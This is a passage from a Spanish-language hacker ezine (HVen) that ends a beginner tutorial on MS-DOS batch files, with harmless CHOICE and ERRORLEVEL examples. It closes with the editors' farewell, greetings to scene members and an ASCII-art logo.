  propio "MENSAJE" que nos permite poner CHOICE. Asi podremos poner:
  "CHOICE /csn Esta usted loco: " (hay un espacio detras de "loco:") con
  lo en la pantalla nos aparecera el mensaje: "Esta usted loco: [S,N]?" y
  ese mensaje seguira ahi hasta que le demos una opcion valida ("s" o
  "n"). Aunque en este caso no era necesario poner "/csn" pues el CHOICE
  establece por defecto las opciones "S" (Si) o "N" (No) si no se
  especifican otras. CHOICE devuelve un codigo de salida (ERRORLEVEL)
  igual a la posicion, en la que se encuentre en lista de opciones, la
  opcion elegida. Por ejemplo, hagamos este programa:

"               @ECHO off
                ECHO 1: Teken Mecolotoff
                ECHO 2: Kimo
                ECHO 3: Dunkelseite
                ECHO 4: Darkdeath 
                ECHO 5: Kliber  
                ECHO n: Netiz
                ECHO s: Spu4nick
                ECHO c: CantvHack
                ECHO m: MHVSS
                ECHO o: Otro cualquiera... (los demas no les he nombrado porque nombrar 40 personas...)
                ECHO 0: Salir (tambien pulsando CTRL + C)
                ECHO.                
                choice /c12345nscmo0 Elija su nombre: 
                IF ERRORLEVEL 1 ECHO Eres un PENDEJO :P
                IF ERRORLEVEL 2 ECHO Ha elegido Kimo 
                IF ERRORLEVEL 3 ECHO Ha elegido Dunkelseite
                IF ERRORLEVEL 4 ECHO Ha elegido Darkdeath
                IF ERRORLEVEL 5 ECHO Ha elegido Kliber
                IF ERRORLEVEL 6 ECHO Ha elegido Netiz
                IF ERRORLEVEL 7 ECHO Ha elegido Spu4nick
                IF ERRORLEVEL 8 ECHO Ha elegido CantvHack
                IF ERRORLEVEL 9 ECHO Este muerde en el cuello! Cuidadito con el!
                IF ERRORLEVEL 10 ECHO Ha elegido otro cualquiera... 
                IF ERRORLEVEL 11 ECHO Ha elegido salir                    "
 
  Este programa como os podeis imaginar pide que se elija un nombre y
  luego lo escribe en pantalla.
  Pero si podemos hacer este:

"               @ECHO OFF
                IF %1=="" GOTO ayuda
                IF %1==Teken ECHO Eres un pendejo
                ECHO Hola %1
                goto fin

                :ayuda
                ECHO.
                ECHO Debe escribir su nombre.
                ECHO.
                ECHO PRUEBA su_nombre                           
                goto fin
                :fin                            "

ESTA GUIA SE HA ACABADO. PROXIMA AVENTURA EN TU ORDENADOR. MAS AYUDA, 
TECLEANDO HELP EN TU SHELL O INTERPRETE DE COMANDOS DEL MS-DOS.


   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹   Despedida   ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹DarKdEaTHÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

  Pues ya llegamos al final,  esperamos que te  haya gustado  este primer
  n£mero de HVen, si ya se, la  pregunta mas frecuente  que de seguro  te
  est s  haciendo  ¨cada cuanto  sale  el  ezine?  pues  ni  yo  tengo la
  respuesta, por lo menos ya se pq tardan tanto en salir los  ezines,  pq
  no es tarea facil hacerlos, pero  si te  puedo  decir que  mientras uds
  envien sus  colaboraciones  el  tiempo entre n£mero y n£mero ser  menor
  :),  por   decir  algo  cada  2  meses aproximadamente  debe  salir  la
  revista, antes de  irme  quiero agradecer a todos los panas que nos han
  ayudado en esto, especialmente  al pana Cyber Optik do Brasil!! que nos
  ha dado un espacio en su servidor  para  nuestra p gina, muito obrigado
  Cyber, se despide...

                              <ÍÍ[HVen Team]ÍÍ>

Saludos oficiales:
Cyber Optik - HackHour          
Taker & Plaxius - Proyecto R    
Hendrix - SET                   
y a toda gente del HVEN TEAM 
Comizionado, KaDiLaC, MHVSS, DitiemeF, Mr.Silence, Merlin, NetiZ, Venkiller,
ThunderByte, CantvHack (un saludo y que revivas alg£n dia), MK4, Spu7nik
y todos los dem s :)

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº 
ºXXXX      X      XXX      XXXXXXXX      XXX          XXX      XXXX      XXXXº 
ºXXXXX    XXX    XXXXX    XXXXXXXXXX    XXXX    XXXXXXXXXX    XXXXXX    XXXXXº 
ºXXXXX    XXX    XXXXXX    XXXXXXXX    XXXXX    XXXXXXXXXX       XXX    XXXXXº
ºXXXXX           XXXXXXX    XXXXXX    XXXXXX        XXXXXX    X   XX    XXXXXº 
ºXXXXX    XXX    XXXXXXXX    XXXX    XXXXXXX    XXXXXXXXXX    XXX  ø    XXXXXº 
ºXXXXX    XXX    XXXXXXXXX    XX    XXXXXXXX    XXXXXXXXXX    XXXXXX    XXXXXº 
ºXXXX      X      XXXXXXXXXX      XXXXXXXXXX          XXX      XXXX      XXXXº 
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº 
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX¹  EZINE  ÌXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº       
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº 
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX²²²²²²²²²²²²²²²XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº  
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX * * * * * * * XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº  
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº  
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº 
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº
ºXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXº  
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ